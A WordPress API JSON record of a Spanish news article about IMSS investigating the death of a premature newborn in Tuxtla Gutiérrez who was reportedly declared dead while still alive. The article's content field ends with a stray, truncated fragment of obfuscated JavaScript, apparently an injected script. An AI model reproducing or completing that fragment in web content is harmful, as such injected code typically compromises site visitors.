{"id":16951,"date":"2024-08-02T01:52:03","date_gmt":"2024-08-02T01:52:03","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=16951"},"modified":"2024-08-02T01:52:04","modified_gmt":"2024-08-02T01:52:04","slug":"se-compromete-imss-a-investigar-muerte-de-recien-nacida-en-el-5-de-mayo","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=16951","title":{"rendered":"Se compromete IMSS a investigar muerte de reci\u00e9n nacida en el 5 de Mayo"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"434\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1722563339658.jpg\" alt=\"\" class=\"wp-image-16952\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1722563339658.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/08\/FB_IMG_1722563339658-300x181.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>1 de agosto del 2024. Tuxtla Guti\u00e9rrez. &#8211; Respecto a la publicaci\u00f3n relacionada con una reci\u00e9n nacida en el Hospital General de Zona (HGZ) No. 2, en Tuxtla Guti\u00e9rrez, la Representaci\u00f3n del Instituto Mexicano del Seguro Social (IMSS) en Chiapas inform\u00f3 que habr\u00e1 una investigaci\u00f3n del caso.<\/p>\n\n\n\n<p>El Instituto lament\u00f3 profundamente el fallecimiento de la menor y se solidariz\u00f3 con los padres, a quienes garantizar\u00e1 todo su respaldo y acompa\u00f1amiento.<\/p>\n\n\n\n<p>El IMSS detall\u00f3 que, se encuentra en curso una investigaci\u00f3n del caso para determinar lo sucedido con la menor, quien naci\u00f3 el pasado 30 de julio del presente con prematurez extrema en el HGZ No. 2 de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>El Instituto colaborar\u00e1 en todo momento con las autoridades correspondientes para el esclarecimiento de lo sucedido y aportar\u00e1 todos los elementos en el \u00e1mbito de su competencia.<\/p>\n\n\n\n<p>Por \u00faltimo dio a conocer que, \u201cSeguiremos informando para dar a conocer m\u00e1s detalles sobre el caso y el desarrollo de la investigaci\u00f3n y el deslinde de responsabilidades que en su caso existan\u201d.<\/p>\n\n\n\n<p>En relaci\u00f3n al caso, se dio a conocer que, la mujer con m\u00e1s 23 semanas de gestaci\u00f3n ingres\u00f3 el pasado lunes 29 de Julio al IMSS del 5 de mayo, para labores de parto. En el proceso realizado por los especialistas del seguro social, la mam\u00e1 asegura haber cargado a su beb\u00e9 con vida.<\/p>\n\n\n\n<p>En un lapso de dos horas, sali\u00f3 del quir\u00f3fano y le notificaron que el neonato hab\u00eda perdido la vida.<\/p>\n\n\n\n<p>Pasaron cerca de 24 horas en duelo por la supuesta muerte del bebe, incluso ya hab\u00edan realizado los tr\u00e1mites con la funeraria, cuando personal del Instituto Mexicano del Seguro Social le avisa qu\u00e9 no pod\u00edan entregar el cuerpo porqu\u00e9 presentaba movimiento.<\/p>\n\n\n\n<p>Al final, el IMSS entreg\u00f3 el acta de defunci\u00f3n y el cuerpo a la funeraria, quien se har\u00eda cargo de la cremaci\u00f3n.<\/p>\n\n\n\n<p>Sin embargo, a los pocos minutos un familiar recibi\u00f3 un mensaje de la funeraria donde le notifican que la bebe a\u00fan contaba con signos vitales, por lo que fue llevada de inmediato al centro m\u00e9dico, donde fue atendida, pero debido a la presunta negligencia perdi\u00f3 la vida.<\/p>\n\n\n\n<p>Por todo ello, se determin\u00f3 enviar un equipo especial e integral de nivel central del IMSS para el esclarecimiento de los hechos, desde la perspectiva m\u00e9dica, atenci\u00f3n a la derechohabiencia y de derechos humanos.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 1 de agosto del 2024. Tuxtla Guti\u00e9rrez. &#8211; Respecto a la publicaci\u00f3n relacionada con una reci\u00e9n nacida en el Hospital General de Zona (HGZ) No. 2, en Tuxtla Guti\u00e9rrez, la Representaci\u00f3n del Instituto Mexicano del Seguro Social (IMSS) en Chiapas inform\u00f3 que habr\u00e1 una investigaci\u00f3n del caso. El Instituto lament\u00f3 profundamente el fallecimiento &hellip;<\/p>\n","protected":false},"author":2,"featured_media":16952,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-16951","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16951","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=16951"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16951\/revisions"}],"predecessor-version":[{"id":16953,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16951\/revisions\/16953"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/16952"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=16951"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=16951"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=16951"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}